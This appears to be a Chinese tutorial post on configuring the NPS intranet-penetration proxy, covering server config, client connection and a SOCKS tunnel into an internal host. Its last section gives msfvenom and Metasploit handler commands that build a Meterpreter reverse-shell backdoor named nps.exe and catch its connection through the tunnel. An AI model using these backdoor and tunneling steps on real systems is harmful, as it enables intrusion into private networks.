资讯

展开

内网穿透代理服务器搭建实验

作者:快盘下载 人气:

Nps;自定义上线;

1、简述;

1;nps;是一款轻量级、高性能、功能强大的内网穿透代理服务器


2;功能;目前支持tcp、udp流量转发;可支持任何tcp、udp上层协议;访问内网网站、本地支付接口调试、ssh访问、远程桌面;内网DNS解析等;;此外还支持内网http代理、内网socks5代理、p2p等;并带有功能强大的web管理端。


3;优点;与Frp类似;但是具有图形化管理界面;更方便配置


4;工具;

client代表客户端;放到内网主机

server代表服务端;放到公网服务器上

;根据内网主机下载;

 Releases · ehang-io/nps (github.com)https://github.com/ehang-io/nps/releases/

 注;

错误情况

需要登陆GitHub后;才能下载

如果下载过慢;使用加速器;然后上传到服务器

;有白嫖的加速器;

隧道搭建,内网穿透,Nps

 隧道搭建,内网穿透,Nps

 






2、工具的配置;

 1、准备;

1;公网服务器

2;内网主机

3;工具下载

如果不知道自己虚拟机是何种框架的

直接在虚拟机设置中查看CD/DVD名称;在名称未改情况下;

4;实验环境

内网Linux-amd-64

服务器centos7

;所以我服务器、客户端就都下的Linux-amd-64;

隧道搭建,内网穿透,Nps

隧道搭建,内网穿透,Nps

登陆GitHub;加速器

下载完成 隧道搭建,内网穿透,Nps




2、服务端配置;

1;上传服务端文件到服务器

隧道搭建,内网穿透,Nps

我是解压之后上传的

选中文件;右键传输

隧道搭建,内网穿透,Nps


2;安装Nps

进入到文件夹;使用xshell;

cd /linux_amd64_server

隧道搭建,内网穿透,Nps



先给nps权限
sudo chmod 777 nps
;不然会报错;被拒绝;
./nps install     #linux
nps.exe install   #windows

 隧道搭建,内网穿透,Nps



3;修改配置文件

conf--->nps.conf

隧道搭建,内网穿透,Nps


vim nps.conf

隧道搭建,内网穿透,Nps


修改的地方;

web的host、账号、密码和端口号

注意;

修改域名代理的端口;避免端口冲突

NPS的web页面默认端口8080;默认账号密码;admin/123

NPS的服务端和客户端进行连接的默认端口是8024;可修改;连接时使用修改后的端口;

NPS服务端开启的端口(即需要访问的VPS的端口)不在配置文件中;在web界面中进行配置

按i进行编辑
;Linux知识点;
appname = nps

#HTTP(S) proxy port, no startup if empty
http_proxy_ip=0.0.0.0
http_proxy_port=80          #域名代理http代理监听端口(修改端口;避免冲突)
https_proxy_port=443        #域名代理https代理监听端口(修改端口;避免冲突)
https_just_proxy=true
#default https certificate setting
https_default_cert_file=conf/server.pem
https_default_key_file=conf/server.key

##bridge
bridge_type=tcp            #客户端与服务端连接的协议
bridge_port=8024           #服务端客户端通信端口;即客户端访问服务端的端口;
bridge_ip=0.0.0.0

# Public password, which clients can use to connect to the server
public_vkey=123        #客户端以配置文件模式启动时的密钥;设置为空表示关闭客户端配置文件连接模式

#Traffic data persistence interval(minute)
#Ignorance means no persistence
#flow_store_interval=1

log_level=7                 #日志输出级别
#log_path=nps.log

#Whether to restrict IP access, true or false or ignore
#ip_limit=true              #是否限制ip访问;true或false或忽略

#p2p
#p2p_ip=127.0.0.1           #服务端IP;使用p2p模式必填
#p2p_port=6000              #p2p模式开启的udp端口

#web
web_host=a.o.com            #需要修改;改为服务器ip
web_username=admin          #web界面管理账号;可修改;
web_password=123            #web界面管理密码;可修改;
web_port = 8080             #web管理端口;访问该端口可以访问NPS后台;可修改;
web_ip=0.0.0.0
web_base_url=               #web管理主路径,用于将web管理置于代理子路径后面
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
# if web under proxy use sub path. like http://host/nps need this.
#web_base_url=/nps

#Web API unauthenticated IP address(the len of auth_crypt_key must be 16)
#Remove comments if needed
#auth_key=test                          #web api密钥
auth_crypt_key =1234567812345678        #获取服务端authKey时的aes加密密钥;16位

#allow_ports=9001-9009,10001,11000-12000

#Web management multi-user login
allow_user_login=false
allow_user_register=false
allow_user_change_username=false


#extension
allow_flow_limit=false
allow_rate_limit=false
allow_tunnel_num_limit=false
allow_local_proxy=false
allow_connection_num_limit=false
allow_multi_ip=false
system_info_display=false

#cache
http_cache=false
http_cache_length=100

#get origin ip
http_add_origin_header=false

#pprof debug options
#pprof_ip=0.0.0.0               #debug pprof 服务端IP
#pprof_port=9999                #debug pprof 端口

#client disconnect timeout
disconnect_timeout=60            #客户端连接超时;单位5s;默认值60;5mins;

改完以后

按Esc

再输入:wq;回车

隧道搭建,内网穿透,Nps


4;启动Nps;

nps start

隧道搭建,内网穿透,Nps


注意;

问题一;

当启动连接失败的时候

输入;
nps
;会有报错信息;



隧道搭建,内网穿透,Nps

8024端口被使用了;换一个端口;再重载配置文件;再启动

重载配置文件
./nps reload

失败了

隧道搭建,内网穿透,Nps


问题二;

在客户端发现连接不上;应该是防火墙问题了

隧道搭建,内网穿透,Nps


5;后台管理界面可以启动

输入ip:port

隧道搭建,内网穿透,Nps

 

 

 




3、客户端配置

1;下贼合适内网主机版本的

我直接复制、粘贴到内网主机了

隧道搭建,内网穿透,Nps


2;端口是否能连接

Linux;./npc -server=ip:port -vkey=服务端的验证密钥
Windows;npc.exe -server=ip:port -vkey=服务端的验证密钥

客户端并还没有生成;这里测试端口是否能连接上

8024端口可以连通;没拒绝访问

;注;客户端未生成;服务端的验证密钥也是没有的;

隧道搭建,内网穿透,Nps

 拒绝就查看配置文件是否设置的一致;服务器端口是否打开


3;修改配置文件


如果修改过;主要是这3个修改

隧道搭建,内网穿透,Nps





3、工具的使用;

1、web管理界面

1;登陆nps后台

账号密码admin/123

(如果修改了的;使用自己修改的登陆)

换为中文;嘿嘿嘿

隧道搭建,内网穿透,Nps


2;新建一个客户端

会生成唯一验证密钥;通过密钥将NPS的服务端和客户端连接起来

隧道搭建,内网穿透,Nps


得到ID、唯一验证密钥隧道搭建,内网穿透,Nps


3;新增SOCKS代理

填上id、端口

服务端端口8024不能填;因为8024是连接客户端与服务端

我们需要重新写一个端口;访问服务端的这个端口;从而访问到内网

隧道搭建,内网穿透,Nps





2、客户端上线

1;连接服务端;上线

Linux;./npc -server=ip:port -vkey=后台服务端生成的验证密钥
Windows;npc.exe -server=ip:port -vkey=后台服务端生成的验证密钥

隧道搭建,内网穿透,Nps

 再次查看服务端后台

已经上线了;实验基本上完成了

隧道搭建,内网穿透,Nps


2;访问内网主机

使用浏览器设置代理;然后访问内网主机



 3、msf后门

生成后门;

msfvenom -p windows/meterpreter/reverse_tcp lhost=…… lport=3333 -f exe -o nps.exe
;注意是生成win、还是Linux的监听器;

;注;lhos;服务器ip、lport;服务器端口;

监听后门;

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run
;注意是win、还是Linux的监听器;

;注;这个监听端口lport;与本地转发端口一致;



加载全部内容

相关教程
猜你喜欢
用户评论
快盘暂不提供评论功能!